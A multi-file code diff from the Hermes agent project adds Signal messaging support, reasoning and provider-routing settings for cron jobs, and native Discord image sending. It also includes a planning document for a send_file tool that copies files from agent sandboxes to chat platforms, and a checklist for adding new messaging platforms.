"whatsapp": Platform.WHATSAPP,
"signal": Platform.SIGNAL,
}
platform = platform_map.get(platform_name.lower())
if not platform:
@@ -176,6 +177,8 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
# Load config.yaml for model, reasoning, prefill, toolsets, provider routing
_cfg = {}
try:
import yaml
_cfg_path = str(_hermes_home / "config.yaml")
@@ -190,6 +193,41 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
except Exception:
pass
# Reasoning config from env or config.yaml
reasoning_config = None
effort = os.getenv("HERMES_REASONING_EFFORT", "")
if not effort:
effort = str(_cfg.get("agent", {}).get("reasoning_effort", "")).strip()
if effort and effort.lower() != "none":
valid = ("xhigh", "high", "medium", "low", "minimal")
if effort.lower() in valid:
reasoning_config = {"enabled": True, "effort": effort.lower()}
elif effort.lower() == "none":
reasoning_config = {"enabled": False}
# Prefill messages from env or config.yaml
prefill_messages = None
prefill_file = os.getenv("HERMES_PREFILL_MESSAGES_FILE", "") or _cfg.get("prefill_messages_file", "")
if prefill_file:
import json as _json
pfpath = Path(prefill_file).expanduser()
if not pfpath.is_absolute():
pfpath = _hermes_home / pfpath
if pfpath.exists():
try:
with open(pfpath, "r", encoding="utf-8") as _pf:
prefill_messages = _json.load(_pf)
if not isinstance(prefill_messages, list):
prefill_messages = None
except Exception:
prefill_messages = None
# Max iterations
max_iterations = _cfg.get("agent", {}).get("max_turns") or _cfg.get("max_turns") or 90
# Provider routing
pr = _cfg.get("provider_routing", {})
from hermes_cli.runtime_provider import (
resolve_runtime_provider,
format_runtime_provider_error,
@@ -208,6 +246,13 @@ def run_job(job: dict) -> tuple[bool, str, str, Optional[str]]:
base_url=runtime.get("base_url"),
provider=runtime.get("provider"),
api_mode=runtime.get("api_mode"),
max_iterations=max_iterations,
reasoning_config=reasoning_config,
prefill_messages=prefill_messages,
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
provider_sort=pr.get("sort"),
quiet_mode=True,
session_id=f"cron_{job_id}_{_hermes_now().strftime('%Y%m%d_%H%M%S')}"
)

View File

@@ -1,7 +0,0 @@
# Documentation
All documentation has moved to the website:
**📖 [hermes-agent.nousresearch.com/docs](https://hermes-agent.nousresearch.com/docs/)**
The documentation source files live in [`website/docs/`](../website/docs/).

View File

@@ -1,344 +0,0 @@
# send_file Integration Map — Hermes Agent Codebase Deep Dive
## 1. environments/tool_context.py — Base64 File Transfer Implementation
### upload_file() (lines 153-205)
- Reads local file as raw bytes, base64-encodes to ASCII string
- Creates parent dirs in sandbox via `self.terminal(f"mkdir -p {parent}")`
- **Chunk size:** 60,000 chars (~60KB per shell command)
- **Small files (<=60KB b64):** Single `printf '%s' '{b64}' | base64 -d > {remote_path}`
- **Large files:** Writes chunks to `/tmp/_hermes_upload.b64` via `printf >> append`, then `base64 -d` to target
- **Error handling:** Checks local file exists; returns `{exit_code, output}`
- **Size limits:** No explicit limit, but shell arg limit ~2MB means chunking is necessary for files >~45KB raw
- **No theoretical max** — but very large files would be slow (many terminal round trips)
### download_file() (lines 234-278)
- Runs `base64 {remote_path}` inside sandbox, captures stdout
- Strips output, base64-decodes to raw bytes
- Writes to host filesystem with parent dir creation
- **Error handling:** Checks exit code, empty output, decode errors
- Returns `{success: bool, bytes: int}` or `{success: false, error: str}`
- **Size limit:** Bounded by terminal output buffer (practical limit ~few MB via base64 terminal output)
### Promotion potential:
- These methods work via `self.terminal()` — they're environment-agnostic
- Could be directly lifted into a new tool that operates on the agent's current sandbox
- For send_file, this `download_file()` pattern is the key: it extracts files from sandbox → host
## 2. tools/environments/base.py — BaseEnvironment Interface
### Current methods:
- `execute(command, cwd, timeout, stdin_data)``{output, returncode}`
- `cleanup()` — release resources
- `stop()` — alias for cleanup
- `_prepare_command()` — sudo transformation
- `_build_run_kwargs()` — subprocess kwargs
- `_timeout_result()` — standard timeout dict
### What would need to be added for file transfer:
- **Nothing required at this level.** File transfer can be implemented via `execute()` (base64 over terminal, like ToolContext does) or via environment-specific methods.
- Optional: `upload_file(local_path, remote_path)` and `download_file(remote_path, local_path)` methods could be added to BaseEnvironment for optimized per-backend transfers, but the base64-over-terminal approach already works universally.
## 3. tools/environments/docker.py — Docker Container Details
### Container ID tracking:
- `self._container_id` stored at init from `self._inner.container_id`
- Inner is `minisweagent.environments.docker.DockerEnvironment`
- Container ID is a standard Docker container hash
### docker cp feasibility:
- **YES**, `docker cp` could be used for optimized file transfer:
- `docker cp {container_id}:{remote_path} {local_path}` (download)
- `docker cp {local_path} {container_id}:{remote_path}` (upload)
- Much faster than base64-over-terminal for large files
- Container ID is directly accessible via `env._container_id` or `env._inner.container_id`
### Volumes mounted:
- **Persistent mode:** Bind mounts at `~/.hermes/sandboxes/docker/{task_id}/workspace``/workspace` and `.../home``/root`
- **Ephemeral mode:** tmpfs at `/workspace` (10GB), `/home` (1GB), `/root` (1GB)
- **User volumes:** From `config.yaml docker_volumes` (arbitrary `-v` mounts)
- **Security tmpfs:** `/tmp` (512MB), `/var/tmp` (256MB), `/run` (64MB)
### Direct host access for persistent mode:
- If persistent, files at `/workspace/foo.txt` are just `~/.hermes/sandboxes/docker/{task_id}/workspace/foo.txt` on host — no transfer needed!
## 4. tools/environments/ssh.py — SSH Connection Management
### Connection management:
- Uses SSH ControlMaster for persistent connection
- Control socket at `/tmp/hermes-ssh/{user}@{host}:{port}.sock`
- ControlPersist=300 (5 min keepalive)
- BatchMode=yes (non-interactive)
- Stores: `self.host`, `self.user`, `self.port`, `self.key_path`
### SCP/SFTP feasibility:
- **YES**, SCP can piggyback on the ControlMaster socket:
- `scp -o ControlPath={socket} {user}@{host}:{remote} {local}` (download)
- `scp -o ControlPath={socket} {local} {user}@{host}:{remote}` (upload)
- Same SSH key and connection reuse — zero additional auth
- Would be much faster than base64-over-terminal for large files
## 5. tools/environments/modal.py — Modal Sandbox Filesystem
### Filesystem API exposure:
- **Not directly.** The inner `SwerexModalEnvironment` wraps Modal's sandbox
- The sandbox object is accessible at: `env._inner.deployment._sandbox`
- Modal's Python SDK exposes `sandbox.open()` for file I/O — but only via async API
- Currently only used for `snapshot_filesystem()` during cleanup
- **Could use:** `sandbox.open(path, "rb")` to read files or `sandbox.open(path, "wb")` to write
- **Alternative:** Base64-over-terminal already works via `execute()` — simpler, no SDK dependency
## 6. gateway/platforms/base.py — MEDIA: Tag Flow (Complete)
### extract_media() (lines 587-620):
- **Pattern:** `MEDIA:\S+` — extracts file paths after MEDIA: prefix
- **Voice flag:** `[[audio_as_voice]]` global directive sets `is_voice=True` for all media in message
- Returns `List[Tuple[str, bool]]` (path, is_voice) and cleaned content
### _process_message_background() media routing (lines 752-786):
- After extracting MEDIA tags, routes by file extension:
- `.ogg .opus .mp3 .wav .m4a``send_voice()`
- `.mp4 .mov .avi .mkv .3gp``send_video()`
- `.jpg .jpeg .png .webp .gif``send_image_file()`
- **Everything else** → `send_document()`
- This routing already supports arbitrary files!
### send_* method inventory (base class):
- `send(chat_id, content, reply_to, metadata)` — ABSTRACT, text
- `send_image(chat_id, image_url, caption, reply_to)` — URL-based images
- `send_animation(chat_id, animation_url, caption, reply_to)` — GIF animations
- `send_voice(chat_id, audio_path, caption, reply_to)` — voice messages
- `send_video(chat_id, video_path, caption, reply_to)` — video files
- `send_document(chat_id, file_path, caption, file_name, reply_to)` — generic files
- `send_image_file(chat_id, image_path, caption, reply_to)` — local image files
- `send_typing(chat_id)` — typing indicator
- `edit_message(chat_id, message_id, content)` — edit sent messages
### What's missing:
- **Telegram:** No override for `send_document` or `send_image_file` — falls back to text!
- **Discord:** No override for `send_document` — falls back to text!
- **WhatsApp:** Has `send_document` and `send_image_file` via bridge — COMPLETE.
- The base class defaults just send "📎 File: /path" as text — useless for actual file delivery.
## 7. gateway/platforms/telegram.py — Send Method Analysis
### Implemented send methods:
- `send()` — MarkdownV2 text with fallback to plain
- `send_voice()``.ogg`/`.opus` as `send_voice()`, others as `send_audio()`
- `send_image()` — URL-based via `send_photo()`
- `send_animation()` — GIF via `send_animation()`
- `send_typing()` — "typing" chat action
- `edit_message()` — edit text messages
### MISSING:
- **`send_document()` NOT overridden** — Need to add `self._bot.send_document(chat_id, document=open(file_path, 'rb'), ...)`
- **`send_image_file()` NOT overridden** — Need to add `self._bot.send_photo(chat_id, photo=open(path, 'rb'), ...)`
- **`send_video()` NOT overridden** — Need to add `self._bot.send_video(...)`
## 8. gateway/platforms/discord.py — Send Method Analysis
### Implemented send methods:
- `send()` — text messages with chunking
- `send_voice()` — discord.File attachment
- `send_image()` — downloads URL, creates discord.File attachment
- `send_typing()` — channel.typing()
- `edit_message()` — edit text messages
### MISSING:
- **`send_document()` NOT overridden** — Need to add discord.File attachment
- **`send_image_file()` NOT overridden** — Need to add discord.File from local path
- **`send_video()` NOT overridden** — Need to add discord.File attachment
## 9. gateway/run.py — User File Attachment Handling
### Current attachment flow:
1. **Telegram photos** (line 509-529): Download via `photo.get_file()``cache_image_from_bytes()` → vision auto-analysis
2. **Telegram voice** (line 532-541): Download → `cache_audio_from_bytes()` → STT transcription
3. **Telegram audio** (line 542-551): Same pattern
4. **Telegram documents** (line 553-617): Extension validation against `SUPPORTED_DOCUMENT_TYPES`, 20MB limit, content injection for text files
5. **Discord attachments** (line 717-751): Content-type detection, image/audio caching, URL fallback for other types
6. **Gateway run.py** (lines 818-883): Auto-analyzes images with vision, transcribes audio, enriches document messages with context notes
### Key insight: Files are always cached to host filesystem first, then processed. The agent sees local file paths.
## 10. tools/terminal_tool.py — Terminal Tool & Environment Interaction
### How it manages environments:
- Global dict `_active_environments: Dict[str, Any]` keyed by task_id
- Per-task creation locks prevent duplicate sandbox creation
- Auto-cleanup thread kills idle environments after `TERMINAL_LIFETIME_SECONDS`
- `_get_env_config()` reads all TERMINAL_* env vars for backend selection
- `_create_environment()` factory creates the right backend type
### Could send_file piggyback?
- **YES.** send_file needs access to the same environment to extract files from sandboxes.
- It can reuse `_active_environments[task_id]` to get the environment, then:
- Docker: Use `docker cp` via `env._container_id`
- SSH: Use `scp` via `env.control_socket`
- Local: Just read the file directly
- Modal: Use base64-over-terminal via `env.execute()`
- The file_tools.py module already does this with `ShellFileOperations` — read_file/write_file/search/patch all share the same env instance.
## 11. tools/tts_tool.py — Working Example of File Delivery
### Flow:
1. Generate audio file to `~/.hermes/audio_cache/tts_TIMESTAMP.{ogg,mp3}`
2. Return JSON with `media_tag: "MEDIA:/path/to/file"`
3. For Telegram voice: prepend `[[audio_as_voice]]` directive
4. The LLM includes the MEDIA tag in its response text
5. `BasePlatformAdapter._process_message_background()` calls `extract_media()` to find the tag
6. Routes by extension → `send_voice()` for audio files
7. Platform adapter sends the file natively
### Key pattern: Tool saves file to host → returns MEDIA: path → LLM echoes it → gateway extracts → platform delivers
## 12. tools/image_generation_tool.py — Working Example of Image Delivery
### Flow:
1. Call FAL.ai API → get image URL
2. Return JSON with `image: "https://fal.media/..."` URL
3. The LLM includes the URL in markdown: `![description](URL)`
4. `BasePlatformAdapter.extract_images()` finds `![alt](url)` patterns
5. Routes through `send_image()` (URL) or `send_animation()` (GIF)
6. Platform downloads and sends natively
### Key difference from TTS: Images are URL-based, not local files. The gateway downloads at send time.
---
# INTEGRATION MAP: Where send_file Hooks In
## Architecture Decision: MEDIA: Tag Protocol vs. New Tool
The MEDIA: tag protocol is already the established pattern for file delivery. Two options:
### Option A: Pure MEDIA: Tag (Minimal Change)
- No new tool needed
- Agent downloads file from sandbox to host using terminal (base64)
- Saves to known location (e.g., `~/.hermes/file_cache/`)
- Includes `MEDIA:/path` in response text
- Existing routing in `_process_message_background()` handles delivery
- **Problem:** Agent has to manually do base64 dance + know about MEDIA: convention
### Option B: Dedicated send_file Tool (Recommended)
- New tool that the agent calls with `(file_path, caption?)`
- Tool handles the sandbox → host extraction automatically
- Returns MEDIA: tag that gets routed through existing pipeline
- Much cleaner agent experience
## Implementation Plan for Option B
### Files to CREATE:
1. **`tools/send_file_tool.py`** — The new tool
- Accepts: `file_path` (path in sandbox), `caption` (optional)
- Detects environment backend from `_active_environments`
- Extracts file from sandbox:
- **local:** `shutil.copy()` or direct path
- **docker:** `docker cp {container_id}:{path} {local_cache}/`
- **ssh:** `scp -o ControlPath=... {user}@{host}:{path} {local_cache}/`
- **modal:** base64-over-terminal via `env.execute("base64 {path}")`
- Saves to `~/.hermes/file_cache/{uuid}_{filename}`
- Returns: `MEDIA:/cached/path` in response for gateway to pick up
- Register with `registry.register(name="send_file", toolset="file", ...)`
### Files to MODIFY:
2. **`gateway/platforms/telegram.py`** — Add missing send methods:
```python
async def send_document(self, chat_id, file_path, caption=None, file_name=None, reply_to=None):
with open(file_path, "rb") as f:
msg = await self._bot.send_document(
chat_id=int(chat_id), document=f,
caption=caption, filename=file_name or os.path.basename(file_path))
return SendResult(success=True, message_id=str(msg.message_id))
async def send_image_file(self, chat_id, image_path, caption=None, reply_to=None):
with open(image_path, "rb") as f:
msg = await self._bot.send_photo(chat_id=int(chat_id), photo=f, caption=caption)
return SendResult(success=True, message_id=str(msg.message_id))
async def send_video(self, chat_id, video_path, caption=None, reply_to=None):
with open(video_path, "rb") as f:
msg = await self._bot.send_video(chat_id=int(chat_id), video=f, caption=caption)
return SendResult(success=True, message_id=str(msg.message_id))
```
3. **`gateway/platforms/discord.py`** — Add missing send methods:
```python
async def send_document(self, chat_id, file_path, caption=None, file_name=None, reply_to=None):
channel = self._client.get_channel(int(chat_id)) or await self._client.fetch_channel(int(chat_id))
with open(file_path, "rb") as f:
file = discord.File(io.BytesIO(f.read()), filename=file_name or os.path.basename(file_path))
msg = await channel.send(content=caption, file=file)
return SendResult(success=True, message_id=str(msg.id))
async def send_image_file(self, chat_id, image_path, caption=None, reply_to=None):
# Same pattern as send_document with image filename
async def send_video(self, chat_id, video_path, caption=None, reply_to=None):
# Same pattern, discord renders video attachments inline
```
4. **`toolsets.py`** — Add `"send_file"` to `_HERMES_CORE_TOOLS` list
5. **`agent/prompt_builder.py`** — Update platform hints to mention send_file tool
### Code that can be REUSED (zero rewrite):
- `BasePlatformAdapter.extract_media()` — Already extracts MEDIA: tags
- `BasePlatformAdapter._process_message_background()` — Already routes by extension
- `ToolContext.download_file()` — Base64-over-terminal extraction pattern
- `tools/terminal_tool.py` _active_environments dict — Environment access
- `tools/registry.py` — Tool registration infrastructure
- `gateway/platforms/base.py` send_document/send_image_file/send_video signatures — Already defined
### Code that needs to be WRITTEN from scratch:
1. `tools/send_file_tool.py` (~150 lines):
- File extraction from each environment backend type
- Local file cache management
- Registry registration
2. Telegram `send_document` + `send_image_file` + `send_video` overrides (~40 lines)
3. Discord `send_document` + `send_image_file` + `send_video` overrides (~50 lines)
### Total effort: ~240 lines of new code, ~5 lines of config changes
## Key Environment-Specific Extract Strategies
| Backend | Extract Method | Speed | Complexity |
|------------|-------------------------------|----------|------------|
| local | shutil.copy / direct path | Instant | None |
| docker | `docker cp container:path .` | Fast | Low |
| docker+vol | Direct host path access | Instant | None |
| ssh | `scp -o ControlPath=...` | Fast | Low |
| modal | base64-over-terminal | Moderate | Medium |
| singularity| Direct path (overlay mount) | Fast | Low |
## Data Flow Summary
```
Agent calls send_file(file_path="/workspace/output.pdf", caption="Here's the report")
send_file_tool.py:
1. Get environment from _active_environments[task_id]
2. Detect backend type (docker/ssh/modal/local)
3. Extract file to ~/.hermes/file_cache/{uuid}_{filename}
4. Return: '{"success": true, "media_tag": "MEDIA:/home/user/.hermes/file_cache/abc123_output.pdf"}'
LLM includes MEDIA: tag in its response text
BasePlatformAdapter._process_message_background():
1. extract_media(response) → finds MEDIA:/path
2. Checks extension: .pdf → send_document()
3. Calls platform-specific send_document(chat_id, file_path, caption)
TelegramAdapter.send_document() / DiscordAdapter.send_document():
Opens file, sends via platform API as native document attachment
User receives downloadable file in chat
```

View File

@@ -40,8 +40,8 @@ def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
except Exception as e:
logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
# Telegram & WhatsApp can't enumerate chats -- pull from session history
for plat_name in ("telegram", "whatsapp"):
# Telegram, WhatsApp & Signal can't enumerate chats -- pull from session history
for plat_name in ("telegram", "whatsapp", "signal"):
if plat_name not in platforms:
platforms[plat_name] = _build_from_sessions(plat_name)
@@ -52,7 +52,7 @@ def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
try:
DIRECTORY_PATH.parent.mkdir(parents=True, exist_ok=True)
with open(DIRECTORY_PATH, "w") as f:
with open(DIRECTORY_PATH, "w", encoding="utf-8") as f:
json.dump(directory, f, indent=2, ensure_ascii=False)
except Exception as e:
logger.warning("Channel directory: failed to write: %s", e)
@@ -115,7 +115,7 @@ def _build_from_sessions(platform_name: str) -> List[Dict[str, str]]:
entries = []
try:
with open(sessions_path) as f:
with open(sessions_path, encoding="utf-8") as f:
data = json.load(f)
seen_ids = set()
@@ -147,7 +147,7 @@ def load_directory() -> Dict[str, Any]:
if not DIRECTORY_PATH.exists():
return {"updated_at": None, "platforms": {}}
try:
with open(DIRECTORY_PATH) as f:
with open(DIRECTORY_PATH, encoding="utf-8") as f:
return json.load(f)
except Exception:
return {"updated_at": None, "platforms": {}}

View File

@@ -26,6 +26,7 @@ class Platform(Enum):
DISCORD = "discord"
WHATSAPP = "whatsapp"
SLACK = "slack"
SIGNAL = "signal"
HOMEASSISTANT = "homeassistant"
@@ -155,7 +156,16 @@ class GatewayConfig:
"""Return list of platforms that are enabled and configured."""
connected = []
for platform, config in self.platforms.items():
if config.enabled and (config.token or config.api_key):
if not config.enabled:
continue
# Platforms that use token/api_key auth
if config.token or config.api_key:
connected.append(platform)
# WhatsApp uses enabled flag only (bridge handles auth)
elif platform == Platform.WHATSAPP:
connected.append(platform)
# Signal uses extra dict for config (http_url + account)
elif platform == Platform.SIGNAL and config.extra.get("http_url"):
connected.append(platform)
return connected
@@ -379,6 +389,26 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
name=os.getenv("SLACK_HOME_CHANNEL_NAME", ""),
)
# Signal
signal_url = os.getenv("SIGNAL_HTTP_URL")
signal_account = os.getenv("SIGNAL_ACCOUNT")
if signal_url and signal_account:
if Platform.SIGNAL not in config.platforms:
config.platforms[Platform.SIGNAL] = PlatformConfig()
config.platforms[Platform.SIGNAL].enabled = True
config.platforms[Platform.SIGNAL].extra.update({
"http_url": signal_url,
"account": signal_account,
"ignore_stories": os.getenv("SIGNAL_IGNORE_STORIES", "true").lower() in ("true", "1", "yes"),
})
signal_home = os.getenv("SIGNAL_HOME_CHANNEL")
if signal_home:
config.platforms[Platform.SIGNAL].home_channel = HomeChannel(
platform=Platform.SIGNAL,
chat_id=signal_home,
name=os.getenv("SIGNAL_HOME_CHANNEL_NAME", "Home"),
)
# Home Assistant
hass_token = os.getenv("HASS_TOKEN")
if hass_token:

View File

@@ -73,7 +73,7 @@ def _find_session_id(platform: str, chat_id: str) -> Optional[str]:
return None
try:
with open(_SESSIONS_INDEX) as f:
with open(_SESSIONS_INDEX, encoding="utf-8") as f:
data = json.load(f)
except Exception:
return None
@@ -103,7 +103,7 @@ def _append_to_jsonl(session_id: str, message: dict) -> None:
"""Append a message to the JSONL transcript file."""
transcript_path = _SESSIONS_DIR / f"{session_id}.jsonl"
try:
with open(transcript_path, "a") as f:
with open(transcript_path, "a", encoding="utf-8") as f:
f.write(json.dumps(message, ensure_ascii=False) + "\n")
except Exception as e:
logger.debug("Mirror JSONL write failed: %s", e)

View File

@@ -0,0 +1,313 @@
# Adding a New Messaging Platform
Checklist for integrating a new messaging platform into the Hermes gateway.
Use this as a reference when building a new adapter — every item here is a
real integration point that exists in the codebase. Missing any of them will
cause broken functionality, missing features, or inconsistent behavior.
---
## 1. Core Adapter (`gateway/platforms/<platform>.py`)
The adapter is a subclass of `BasePlatformAdapter` from `gateway/platforms/base.py`.
### Required methods
| Method | Purpose |
|--------|---------|
| `__init__(self, config)` | Parse config, init state. Call `super().__init__(config, Platform.YOUR_PLATFORM)` |
| `connect() -> bool` | Connect to the platform, start listeners. Return True on success |
| `disconnect()` | Stop listeners, close connections, cancel tasks |
| `send(chat_id, text, ...) -> SendResult` | Send a text message |
| `send_typing(chat_id)` | Send typing indicator |
| `send_image(chat_id, image_url, caption) -> SendResult` | Send an image |
| `get_chat_info(chat_id) -> dict` | Return `{name, type, chat_id}` for a chat |
### Optional methods (have default stubs in base)
| Method | Purpose |
|--------|---------|
| `send_document(chat_id, path, caption)` | Send a file attachment |
| `send_voice(chat_id, path)` | Send a voice message |
| `send_video(chat_id, path, caption)` | Send a video |
| `send_animation(chat_id, path, caption)` | Send a GIF/animation |
| `send_image_file(chat_id, path, caption)` | Send image from local file |
### Required function
```python
def check_<platform>_requirements() -> bool:
"""Check if this platform's dependencies are available."""
```
### Key patterns to follow
- Use `self.build_source(...)` to construct `SessionSource` objects
- Call `self.handle_message(event)` to dispatch inbound messages to the gateway
- Use `MessageEvent`, `MessageType`, `SendResult` from base
- Use `cache_image_from_bytes`, `cache_audio_from_bytes`, `cache_document_from_bytes` for attachments
- Filter self-messages (prevent reply loops)
- Filter sync/echo messages if the platform has them
- Redact sensitive identifiers (phone numbers, tokens) in all log output
- Implement reconnection with exponential backoff + jitter for streaming connections
- Set `MAX_MESSAGE_LENGTH` if the platform has message size limits
---
## 2. Platform Enum (`gateway/config.py`)
Add the platform to the `Platform` enum:
```python
class Platform(Enum):
...
YOUR_PLATFORM = "your_platform"
```
Add env var loading in `_apply_env_overrides()`:
```python
# Your Platform
your_token = os.getenv("YOUR_PLATFORM_TOKEN")
if your_token:
if Platform.YOUR_PLATFORM not in config.platforms:
config.platforms[Platform.YOUR_PLATFORM] = PlatformConfig()
config.platforms[Platform.YOUR_PLATFORM].enabled = True
config.platforms[Platform.YOUR_PLATFORM].token = your_token
```
Update `get_connected_platforms()` if your platform doesn't use token/api_key
(e.g., WhatsApp uses `enabled` flag, Signal uses `extra` dict).
---
## 3. Adapter Factory (`gateway/run.py`)
Add to `_create_adapter()`:
```python
elif platform == Platform.YOUR_PLATFORM:
from gateway.platforms.your_platform import YourAdapter, check_your_requirements
if not check_your_requirements():
logger.warning("Your Platform: dependencies not met")
return None
return YourAdapter(config)
```
---
## 4. Authorization Maps (`gateway/run.py`)
Add to BOTH dicts in `_is_user_authorized()`:
```python
platform_env_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOWED_USERS",
}
platform_allow_all_map = {
...
Platform.YOUR_PLATFORM: "YOUR_PLATFORM_ALLOW_ALL_USERS",
}
```
---
## 5. Session Source (`gateway/session.py`)
If your platform needs extra identity fields (e.g., Signal's UUID alongside
phone number), add them to the `SessionSource` dataclass with `Optional` defaults,
and update `to_dict()`, `from_dict()`, and `build_source()` in base.py.
---
## 6. System Prompt Hints (`agent/prompt_builder.py`)
Add a `PLATFORM_HINTS` entry so the agent knows what platform it's on:
```python
PLATFORM_HINTS = {
...
"your_platform": (
"You are on Your Platform. "
"Describe formatting capabilities, media support, etc."
),
}
```
Without this, the agent won't know it's on your platform and may use
inappropriate formatting (e.g., markdown on platforms that don't render it).
---
## 7. Toolset (`toolsets.py`)
Add a named toolset for your platform:
```python
"hermes-your-platform": {
"description": "Your Platform bot toolset",
"tools": _HERMES_CORE_TOOLS,
"includes": []
},
```
And add it to the `hermes-gateway` composite:
```python
"hermes-gateway": {
"includes": [..., "hermes-your-platform"]
}
```
---
## 8. Cron Delivery (`cron/scheduler.py`)
Add to `platform_map` in `_deliver_result()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Without this, `schedule_cronjob(deliver="your_platform")` silently fails.
---
## 9. Send Message Tool (`tools/send_message_tool.py`)
Add to `platform_map` in `send_message_tool()`:
```python
platform_map = {
...
"your_platform": Platform.YOUR_PLATFORM,
}
```
Add routing in `_send_to_platform()`:
```python
elif platform == Platform.YOUR_PLATFORM:
return await _send_your_platform(pconfig, chat_id, message)
```
Implement `_send_your_platform()` — a standalone async function that sends
a single message without requiring the full adapter (for use by cron jobs
and the send_message tool outside the gateway process).
Update the tool schema `target` description to include your platform example.
---
## 10. Cronjob Tool Schema (`tools/cronjob_tools.py`)
Update the `deliver` parameter description and docstring to mention your
platform as a delivery option.
---
## 11. Channel Directory (`gateway/channel_directory.py`)
If your platform can't enumerate chats (most can't), add it to the
session-based discovery list:
```python
for plat_name in ("telegram", "whatsapp", "signal", "your_platform"):
```
---
## 12. Status Display (`hermes_cli/status.py`)
Add to the `platforms` dict in the Messaging Platforms section:
```python
platforms = {
...
"Your Platform": ("YOUR_PLATFORM_TOKEN", "YOUR_PLATFORM_HOME_CHANNEL"),
}
```
---
## 13. Gateway Setup Wizard (`hermes_cli/gateway.py`)
Add to the `_PLATFORMS` list:
```python
{
"key": "your_platform",
"label": "Your Platform",
"emoji": "📱",
"token_var": "YOUR_PLATFORM_TOKEN",
"setup_instructions": [...],
"vars": [...],
}
```
If your platform needs custom setup logic (connectivity testing, QR codes,
policy choices), add a `_setup_your_platform()` function and route to it
in the platform selection switch.
Update `_platform_status()` if your platform's "configured" check differs
from the standard `bool(get_env_value(token_var))`.
---
## 14. Phone/ID Redaction (`agent/redact.py`)
If your platform uses sensitive identifiers (phone numbers, etc.), add a
regex pattern and redaction function to `agent/redact.py`. This ensures
identifiers are masked in ALL log output, not just your adapter's logs.
---
## 15. Documentation
| File | What to update |
|------|---------------|
| `README.md` | Platform list in feature table + documentation table |
| `AGENTS.md` | Gateway description + env var config section |
| `website/docs/user-guide/messaging/<platform>.md` | **NEW** — Full setup guide (see existing platform docs for template) |
| `website/docs/user-guide/messaging/index.md` | Architecture diagram, toolset table, security examples, Next Steps links |
| `website/docs/reference/environment-variables.md` | All env vars for the platform |
---
## 16. Tests (`tests/gateway/test_<platform>.py`)
Recommended test coverage:
- Platform enum exists with correct value
- Config loading from env vars via `_apply_env_overrides`
- Adapter init (config parsing, allowlist handling, default values)
- Helper functions (redaction, parsing, file type detection)
- Session source round-trip (to_dict → from_dict)
- Authorization integration (platform in allowlist maps)
- Send message tool routing (platform in platform_map)
Optional but valuable:
- Async tests for message handling flow (mock the platform API)
- SSE/WebSocket reconnection logic
- Attachment processing
- Group message filtering
---
## Quick Verification
After implementing everything, verify with:
```bash
# All tests pass
python -m pytest tests/ -q
# Grep for your platform name to find any missed integration points
grep -r "telegram\|discord\|whatsapp\|slack" gateway/ tools/ agent/ cron/ hermes_cli/ toolsets.py \
--include="*.py" -l | sort -u
# Check each file in the output — if it mentions other platforms but not yours, you missed it
```

View File

@@ -252,6 +252,7 @@ def cleanup_document_cache(max_age_hours: int = 24) -> int:
class MessageType(Enum):
"""Types of incoming messages."""
TEXT = "text"
LOCATION = "location"
PHOTO = "photo"
VIDEO = "video"
AUDIO = "audio"
@@ -701,6 +702,8 @@ class BasePlatformAdapter(ABC):
# Extract image URLs and send them as native platform attachments
images, text_content = self.extract_images(response)
if images:
logger.info("[%s] extract_images found %d image(s) in response (%d chars)", self.name, len(images), len(response))
# Send the text portion first (if any remains after extractions)
if text_content:
@@ -727,10 +730,13 @@ class BasePlatformAdapter(ABC):
human_delay = self._get_human_delay()
# Send extracted images as native attachments
if images:
logger.info("[%s] Extracted %d image(s) to send as attachments", self.name, len(images))
for image_url, alt_text in images:
if human_delay > 0:
await asyncio.sleep(human_delay)
try:
logger.info("[%s] Sending image: %s (alt=%s)", self.name, image_url[:80], alt_text[:30] if alt_text else "")
# Route animated GIFs through send_animation for proper playback
if self._is_animation_url(image_url):
img_result = await self.send_animation(
@@ -745,9 +751,9 @@ class BasePlatformAdapter(ABC):
caption=alt_text if alt_text else None,
)
if not img_result.success:
print(f"[{self.name}] Failed to send image: {img_result.error}")
logger.error("[%s] Failed to send image: %s", self.name, img_result.error)
except Exception as img_err:
print(f"[{self.name}] Error sending image: {img_err}")
logger.error("[%s] Error sending image: %s", self.name, img_err, exc_info=True)
# Send extracted media files — route by file type
_AUDIO_EXTS = {'.ogg', '.opus', '.mp3', '.wav', '.m4a'}
@@ -833,6 +839,8 @@ class BasePlatformAdapter(ABC):
user_name: Optional[str] = None,
thread_id: Optional[str] = None,
chat_topic: Optional[str] = None,
user_id_alt: Optional[str] = None,
chat_id_alt: Optional[str] = None,
) -> SessionSource:
"""Helper to build a SessionSource for this platform."""
# Normalize empty topic to None
@@ -847,6 +855,8 @@ class BasePlatformAdapter(ABC):
user_name=user_name,
thread_id=str(thread_id) if thread_id else None,
chat_topic=chat_topic.strip() if chat_topic else None,
user_id_alt=user_id_alt,
chat_id_alt=chat_id_alt,
)
@abstractmethod

View File

@@ -267,6 +267,43 @@ class DiscordAdapter(BasePlatformAdapter):
print(f"[{self.name}] Failed to send audio: {e}")
return await super().send_voice(chat_id, audio_path, caption, reply_to)
async def send_image_file(
self,
chat_id: str,
image_path: str,
caption: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send a local image file natively as a Discord file attachment."""
if not self._client:
return SendResult(success=False, error="Not connected")
try:
import io
channel = self._client.get_channel(int(chat_id))
if not channel:
channel = await self._client.fetch_channel(int(chat_id))
if not channel:
return SendResult(success=False, error=f"Channel {chat_id} not found")
if not os.path.exists(image_path):
return SendResult(success=False, error=f"Image file not found: {image_path}")
filename = os.path.basename(image_path)
with open(image_path, "rb") as f:
file = discord.File(io.BytesIO(f.read()), filename=filename)
msg = await channel.send(
content=caption if caption else None,
file=file,
)
return SendResult(success=True, message_id=str(msg.id))
except Exception as e:
print(f"[{self.name}] Failed to send local image: {e}")
return await super().send_image_file(chat_id, image_path, caption, reply_to)
async def send_image(
self,
chat_id: str,
